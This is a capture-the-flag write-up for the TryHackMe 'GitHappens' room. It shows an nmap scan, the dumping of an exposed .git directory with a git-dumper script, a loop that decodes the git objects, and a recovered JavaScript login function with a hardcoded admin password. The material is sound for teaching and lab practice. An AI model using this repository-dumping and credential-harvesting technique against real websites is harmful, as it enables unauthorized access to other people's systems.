# CTF TryHackMe - GitHappens

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.173.172                 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 17:48 CEST
Nmap scan report for 10.10.173.172
Host is up (0.088s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-git: 
|   10.10.173.172:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds
```
Discover only port 80 is open

## Using git dumper to get to .git folder localy

```bash
./gitdumper.sh http://10.10.173.172:80/.git/ git_files
```

I have enumerate all the content. Now i need to decode the object. using gitit.py

```bash
cd git_files/.git/objects
for i in `find . -type f`; do /home/grib/Documents/THM/GitHappens/gitit.py $i; done > /home/grib/Documents/THM/GitHappens/git_objects_decoded.txt
```

Now check the output in git_objects_decoded.txt
I found the login function with the flag

```
      function login() {
        let form = document.getElementById("login-form");
        console.log(form.elements);
        let username = form.elements["username"].value;
        let password = form.elements["password"].value;
        if (
          username === "admin" &&
          password === "Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!" 
        ) { 
          document.cookie = "login=1"; 
          window.location.href = "/dashboard.html"; 
        } else {
          document.getElementById("error").innerHTML =
            "INVALID USERNAME OR PASSWORD!";
```
